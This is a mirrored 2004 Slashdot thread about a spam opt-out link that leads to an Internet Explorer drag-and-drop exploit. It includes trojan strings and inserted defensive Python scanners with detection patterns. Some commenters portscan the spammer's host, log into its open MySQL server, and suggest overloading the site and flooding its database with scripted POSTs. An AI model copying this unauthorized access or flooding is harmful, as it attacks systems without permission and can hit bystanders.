Slashdot Mirror


Spam Opt-out Link Triggers Malicious Code Attack

Maestro4k writes "The Register is reporting on a new spam E-mail circulating out there. In it, clicking on the 'Click here to remove' link launches a site that, when the user scrolls the page, triggers a drag-drop javascript exploit. Scarily, the E-mail actually complies with the CAN-SPAM act, as it only requires spammers to put an opt-out link in their mailings. As The Reg says, "It comes as little surprise that this feature is being taken advantage of in a social engineering exploit; but it does illustrate the security problems of the opt-out approach that were always apparent to security experts - and ignored by legislators." The link in question points to www. xcelent.biz (as in The Reg story, space intentionally included), so even if you can't block the mail yet it should be easy to block access to the site with the exploit. I suspect this is just the beginning and most spam will include "features" such as this in the near future."

30 of 327 comments

  1. devious by hendridm · · Score: 4, Informative

    Fortunately, there is a patch for it, Mozilla is unaffected, and Norton and McAfee (at minimum) seem to detect it. That just leaves the millions of unpatched Windows machines that are running out-dated or low-grade antivirus!

  2. Microsoft says "No Problem" by Anonymous Coward · · Score: 5, Funny
    Don't worry, this isn't a real problem:
    "Given the significant amount of user action required to execute an attack, Microsoft does not consider this to be a high risk for customers," a company representative said, adding that the software giant's security experts are continuing to research the issue.

    I mean, using a scrollbar. Come on, what kind of ignorant user is going to use a scrollbar on a site they don't trust? ;-)
    1. Re:Microsoft says "No Problem" by Anonymous Coward · · Score: 5, Informative

      Here is the pertinent CERT advisory for this flaw.

      The idea is that all the website designer has to do is make an image that LOOKS like a scrollbar. The user goes and clicks and drags it to scroll down, not knowing it's fake. If there is a DYNSRC="..." attribute specified in the <IMG...> tag, Internet Explorer downloads and runs whatever program is specified, without any kind of prompt whatsoever.

      Even with SP2 installed.

    2. Re:Microsoft says "No Problem" by bheerssen · · Score: 5, Interesting

      Yep, exactly right.

      For the curious, here is an interesting post that describes the exploit at some length. Essentially, it uses an HTML 'dynsrc' attribute (proprietary Microsoft extension) to allow IE to download the executable, and javascript to use the 'shell:' protocol to execute it. It's not a particularly new flaw, but this is the slickest exploit of it I've seen.

      --
      (Score: -1, Stupid)
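A defender-side check for the technique the two replies above describe, as an added example that is not code from the thread or from the site it discusses: a small Python scanner that flags IMG tags carrying a dynsrc attribute (high severity when it points at an executable), drag-event handlers, and script or attribute values that use the shell: protocol. The sample page is constructed here and the example.invalid host is a placeholder.

```python
import re
from html.parser import HTMLParser

# Constructed sample page (not the real site's code) imitating the trick in the
# thread: a fake scrollbar <img> whose dynsrc points at an .exe, plus shell: use.
SAMPLE_PAGE = """<html><body>
<img src="scrollbar.gif" dynsrc="http://example.invalid/windows-update.exe" ondragstart="drag()">
<script>
// probably the dumbest scrollbar emulation on this planet ;)
function drag() { window.location = "shell:windows-update.exe"; }
</script></body></html>"""

EXEC_EXT = re.compile(r"\.(exe|scr|com|pif|bat|cmd|hta)(\?|$)", re.I)
SHELL_PROTO = re.compile(r"\bshell:", re.I)
SEVERITY = {"none": 0, "low": 1, "medium": 2, "high": 3}

class DragDropIndicatorParser(HTMLParser):
    # Collects (severity, message) pairs for the IE dynsrc / drag-and-drop pattern.
    def __init__(self):
        super().__init__()
        self.findings = []
        self._in_script = False
    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self._in_script = True
        # HTMLParser lowercases attribute names, so DYNSRC and dynsrc both match.
        for name, value in attrs:
            value = value or ""
            if name == "dynsrc":  # IE-only attribute that fetches a second resource
                sev = "high" if EXEC_EXT.search(value) else "medium"
                self.findings.append((sev, f"<{tag}> dynsrc={value!r}"))
            elif name.startswith("on") and "drag" in name:
                self.findings.append(("low", f"<{tag}> drag handler {name}"))
            elif SHELL_PROTO.search(value):
                self.findings.append(("high", f"<{tag}> {name} uses shell: protocol"))
    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False
    def handle_data(self, data):
        if self._in_script and SHELL_PROTO.search(data):
            self.findings.append(("high", "inline script uses shell: protocol"))

def scan_html(page: str):
    # Every indicator found in the document, as (severity, message) pairs.
    parser = DragDropIndicatorParser()
    parser.feed(page)
    parser.close()
    return parser.findings

def verdict(page: str) -> str:
    # Highest severity observed: 'high', 'medium', 'low' or 'none'.
    return max((s for s, _ in scan_html(page)), key=SEVERITY.get, default="none")
```

Running scan_html(SAMPLE_PAGE) lists the dynsrc hit, the ondragstart handler and the shell: reference in the script, and verdict(SAMPLE_PAGE) returns "high".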
  3. I dont know about you by OverlordQ · · Score: 4, Informative
    but my AntiVirus has detected this exploit for a *long* time.

    JS/Exploit-DragDrop.b.gen
    --
    Your hair look like poop, Bob! - Wanker.
    1. Re:I dont know about you by orangesquid · · Score: 4, Informative

      A simple string analysis of the trojan reveals some intimidating-looking strings:
      GetSystemDirectoryA, xProxyBot v 1.0.0, 1.0.0, w32.exe,
      Windows Service Application, www.earthlabs.biz,
      sockproxy/rec.php.
      Software\Microsoft\Windows\CurrentVersion\Run
      Software\Microsoft\Windows\CurrentVersion\RunServices
      %s?&p=%d&v=%s
      VisitWebPageThread, Socket4RandomThread, Socket4ServerThread
      SYSTEM\CurrentControlSet\Control\SafeBoot\
      explorer.exe
      Mozilla/4.0 (compatible)
      InternetCloseHandle, InternetGetLastResponseInfoA
      InternetReadFile, InternetCrackUrlA
      InternetOpenUrlA
      InternetOpenA, InternetConnectA
      FtpPutFileA, FtpGetFileA
      HttpSendRequestA, HttpOpenRequestA
      InternetGetConnectedStateEx, InternetGetConnectedState

      --
      --TheOrangeSquid Is it any wonder things seem so awry? We swim in a sea of confusion and don't have to think to survive
  4. Greeting from Malaysia by politicsie04 · · Score: 5, Funny

    Whois says that the website is operated by Anandan Krishan from Malaysia, so let's all send him an email, win2save@yahoo.com, complaining that he has discriminated against Firefox and Linux users of his website, and that in future he should have a more inclusive virus.

  5. Dumb by sl8r · · Score: 5, Funny
    Also, the programmer seems to have had fun writing the javascript on that xcelent.biz page. From the source:
    // probably the dumbest scrollbar emulation on this planet ;)
    1. Re:Dumb by Benanov · · Score: 5, Informative

      That comment means it was ripped from a proof-of-concept website published a while ago: http://www.mikx.de/scrollbar/ - amazingly shameless. They stole this guy's code, AND they're using it for phishing attacks.

  6. Why is the site still up? by jarich · · Score: 4, Insightful
    The article says they know the name of the website... why is it still there? Why is the EXE still available?

    I realize that another spammer will take advantage of the hole next week, but if the hosters were blacklisted from DNS servers, the offending files might get removed a little faster.

    1. Re:Why is the site still up? by gorbachev · · Score: 5, Funny

      Two possible reasons:

      1. Law enforcement agencies asked to keep it up

      2. Hinet Taiwan doesn't give a shit

      I'm betting on option #2.

      --
      In Soviet Russia, I ruled you
  7. Useful slashdotting!! by Evan+Meakyl · · Score: 4, Funny

    The link in question points to www. xcelent.biz (as in The Reg story, space intentionally included)

    There should be a real link, in order to /. it!!!

  8. Use your powers for good by Mignon · · Score: 4, Interesting

    Why don't we non IE-users use the Slashdot effect for good? Let's all visit the evil site and soon it will be a steaming pile of rubble.

    1. Re:Use your powers for good by ElNeo · · Score: 5, Funny

      Like this nice link?

  9. New News? by Kartik3 · · Score: 5, Informative

    Spammers have often used an "unsubscribe" link or something similar only to verify your email address and send you more spam. While not the same as triggering an exploit, I've been under the impression that spammers have taken advantage of users with an "opt out" type of link in this way for quite a while now.

  10. lamer is hosted on hinet.com by Indy1 · · Score: 4, Informative

    host www.xcelent.biz
    www.xcelent.biz has address 61.218.79.53
    host 61.218.79.53
    53.79.218.61.in-addr.arpa domain name pointer 61-218-79-53.HINET-IP.hinet.net

    and people wonder why I firewall 60/7

    --
    Lawyers, MBA's, RIAA? A jedi fears not these things!
  11. Exploit by jargoone · · Score: 5, Informative

    The article didn't give much explanation about the drag-and-drop exploit itself. Understandably, given the audience, but I was curious. Here's a good link: http://xforce.iss.net/xforce/xfdb/13679

  12. interesting ports on the spammer's site by Indy1 · · Score: 5, Interesting

    Starting nmap 3.70 ( http://www.insecure.org/nmap/ ) at 2004-09-22 09:54 MDT
    Interesting ports on 61-218-79-53.HINET-IP.hinet.net (61.218.79.53):
    (The 1651 ports scanned but not shown below are in state: closed)
    PORT STATE SERVICE
    21/tcp open ftp
    22/tcp open ssh
    80/tcp open http
    111/tcp open rpcbind
    135/tcp filtered msrpc
    443/tcp open https
    445/tcp filtered microsoft-ds
    3306/tcp open mysql
    6000/tcp open X11

    Nmap run completed -- 1 IP address (1 host up) scanned in 54.453 seconds

    --
    Lawyers, MBA's, RIAA? A jedi fears not these things!
    1. Re:interesting ports on the spammer's site by caluml · · Score: 5, Interesting

      bash-2.05b$ mysql -h 61-218-79-53.HINET-IP.hinet.net
      Welcome to the MySQL monitor. Commands end with ; or \g.
      Your MySQL connection id is 658 to server version: 3.23.54

      Type 'help;' or '\h' for help. Type '\c' to clear the buffer.

      mysql> show databases;
      +-----------------+
      | Database |
      +-----------------+
      | earth_bizzads |
      | herbalmarketing |
      | mysql |
      +-----------------+
      3 rows in set (0.45 sec)

      mysql>

    2. Re:interesting ports on the spammer's site by ravydavygravy · · Score: 4, Funny
      Heh - this is what it looked like a few minutes ago...
      mysql> use test;
      Database changed
      mysql> show tables;
      +----------------+
      | Tables_in_test |
      +----------------+
      | SPAMMERS_SUX0r |
      | w00t |
      +----------------+
      2 rows in set (0.84 sec)
  13. Re:Another good reason... by Anonymous Coward · · Score: 4, Funny

    ..to get SpamAssassin.

    No. A good reason to hire a Spammer Assassin,
    perhaps.

    Violent, painful death is, after all, the only thing these sleazeballs fear.

  14. Re:More Legislation Needed. by stratjakt · · Score: 5, Insightful

    There's nothing legal about this.

    It's not specifically illegal under the CAN-SPAM act, but it's just as illegal as any other exploit, trojan or worm.

    --
    I don't need no instructions to know how to rock!!!!
  15. Even better - choose a link with graphics on. by cliveholloway · · Score: 4, Informative
    After a little guessing:

    a b c d. "d" looks pretty heavy on graphics.

    .02

    cLive ;-)

    --
    -- Trinity in high heels carrying a whip: The donimatrix - there is no spoonerism
  16. Why is this a surprise? by mykepredko · · Score: 4, Insightful

    Seriously.

    It's not like spammers are a class of people to be trusted. I always felt the opt-out requirement was a joke and prime for abuse. By opting out, you are telling the spammer that you read every email that comes your way, and they add it to their list of email addresses that actually respond to spam.

    So what do they do with this list? If they follow the letter of the law, they will stop spamming - but, they have a list of high quality email IDs that they can sell to other spammers.

    Users should always follow these simple instructions with regards to email spam:

    1. Make sure you have an incoming mail spam filter, like SpamAssassin.
    2. Delete any spam that gets through.
    3. If you are interested in the product, do not contact the email (spam) source, reply to the email, or click on "helpful" buttons. Find reputable mainstream vendors - if it's great, then Wal-Mart, Best Buy, Circuit City, etc. will stock it.

    myke

  17. Other sites on same server doing the same thing. by Chatmag · · Score: 4, Informative

    There is a slew of sites on that same server according to Webhosting Info that are infected, some with windows-update.exe and others with windows-update32.exe

    --
    Pete Carr Owner Chatmag.com
  18. But then again . . . by harley_frog · · Score: 5, Insightful

    it is a site worthy of a good slashdotting, if just to keep the unwary from reaching it.

    --
    It's all fun and games until someone loses the key to the handcuffs.
    1. Re:But then again . . . by mdfst13 · · Score: 5, Informative

      http://www.xcelent.biz/d/ is a link to another page in that domain. Also has more graphics for better slashdotting potential.

      P.S. Still be careful. They could always move the pages around.
  19. Hazardous link by abb3w · · Score: 4, Informative
    Now, now, there might be someone who might go to that page with IE. However, no doubt the Slashdot community would be interested in attempting their own effort at reverse engineering the trojan that they want you to download.

    Of course, anyone who installs that on a non-isolated, non-virtual machine pretty much deserves the results. It looks like it has the standard "Software\Microsoft\Windows\CurrentVersion\Run", "Software\Microsoft\Windows\CurrentVersion\RunServices", and "SYSTEM\CurrentControlSet\Control\SafeBoot\" registry hooks. (Unix "strings" is your friend....)

    --
    //Information does not want to be free; it wants to breed.
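The strings(1) triage that orangesquid's list (comment 3) and abb3w's post above both rely on, as an added example that is not code from the thread: a Python routine that pulls printable ASCII runs out of a binary blob the way strings(1) does, then buckets them into autorun registry paths, WinINet API names, network indicators and dropped-file names. The sample "binary" is constructed inline with strings of the kind the thread reports; www.example.invalid is a placeholder host, not the one in the thread.

```python
import re

# Constructed sample "binary" (not the real trojan): non-printable filler with
# embedded strings of the kind the thread reports, namely autorun registry keys,
# WinINet API names, a dropped .exe name and a C2-style URL path.
FILLER = bytes(range(0, 32)) * 2
SAMPLE_BINARY = FILLER.join([
    b"\x00", b"GetSystemDirectoryA", b"w32.exe",
    b"Software\\Microsoft\\Windows\\CurrentVersion\\Run",
    b"Software\\Microsoft\\Windows\\CurrentVersion\\RunServices",
    b"SYSTEM\\CurrentControlSet\\Control\\SafeBoot\\",
    b"www.example.invalid", b"sockproxy/rec.php", b"%s?&p=%d&v=%s",
    b"Mozilla/4.0 (compatible)", b"InternetOpenUrlA", b"HttpSendRequestA",
    b"FtpPutFileA", b"ab", b"\x00",
])

# Indicator classes worth pulling out of a strings dump; checked in this order.
CATEGORIES = {
    "persistence": re.compile(r"CurrentVersion\\Run(Services)?$|SafeBoot", re.I),
    "wininet_api": re.compile(r"^(Internet|Http|Ftp)[A-Z][A-Za-z]+[AW]$"),
    "network_ioc": re.compile(r"^www\.|\.php$|^Mozilla/|%s\?|https?://", re.I),
    "dropped_file": re.compile(r"\.(exe|dll|scr)$", re.I),
}

def extract_strings(blob: bytes, min_len: int = 4):
    # Printable ASCII runs of at least min_len bytes, like Unix strings(1).
    pat = re.compile(rb"[\x20-\x7e]{%d,}" % min_len)
    return [m.group().decode("ascii") for m in pat.finditer(blob)]

def triage(blob: bytes):
    # Bucket each string under the first matching class; 'other' takes the rest.
    buckets = {name: [] for name in CATEGORIES}
    buckets["other"] = []
    for s in extract_strings(blob):
        for name, pat in CATEGORIES.items():
            if pat.search(s):
                buckets[name].append(s)
                break
        else:
            buckets["other"].append(s)
    return buckets

def persistence_risk(blob: bytes) -> bool:
    # True when autorun registry paths and network APIs occur together.
    b = triage(blob)
    return bool(b["persistence"]) and bool(b["wininet_api"])

if __name__ == "__main__":
    for name, items in triage(SAMPLE_BINARY).items():
        print(f"{name}: {items}")
```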
  20. Re:More Legislation Needed. by gcaseye6677 · · Score: 4, Insightful

    The government could crack down on most spam sources anytime they feel like taking the problem seriously. With all the business, tax code, interstate commerce, and other regulations on the books already, any spammer is bound to be violating a bunch of existing laws. And since many spamvertized products and services are fraudulent or blatantly illegal, simply prosecuting with traditional laws would be adequate.

    If the IRS started auditing every known spammer with operations or residence in the United States, that would have a very chilling effect on spam. I'd bet my life savings that spammers don't report all of their income for tax purposes. If other countries then followed suit, spam would be relegated to the far corners of the world and easily firewalled.

  21. Fill his database by caffeine_monkey · · Score: 4, Interesting

    It looks like he's not checking the field length of that "email addr" input before inserting it into the DB, so it should be a simple matter for someone to write a script to continuously loop through a POST to http://61.218.79.53/o/cgi-bin/removeme.cgi with a large amount of data in the field name "email". If a few people do this, his DB should fill up pretty quick.